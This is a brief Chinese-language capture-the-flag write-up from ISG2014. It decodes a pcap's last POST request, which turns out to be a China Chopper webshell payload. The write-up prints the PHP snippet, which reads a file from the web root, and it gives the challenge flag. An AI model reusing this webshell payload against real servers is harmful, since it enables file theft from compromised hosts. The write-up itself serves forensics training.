over 3 years ago

pcap 裡最後一個 POST request,解碼後可以看出它試著讀取檔案 z1=/var/www/html/x.tar.gz

<?
@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");
$F=get_magic_quotes_gpc()?stripslashes($_POST["z1"]):$_POST["z1"];
$fp=@fopen($F,"r");
if(@fgetc($fp)){
    @fclose($fp);
    @readfile($F);
}else{
    echo("ERROR:// Can Not Read");
};
echo("|<-");
die();
?>

因此 result 去掉頭尾的 ->|, |<- 後,中間的 x.tar.gz 解開即可得到 flag:
ISG{China_Ch0pper_Is_A_Slick_Little_Webshe11}

Source code: chopper.py

← ISG2014 SQLMAP ISG2014 TRAC4! →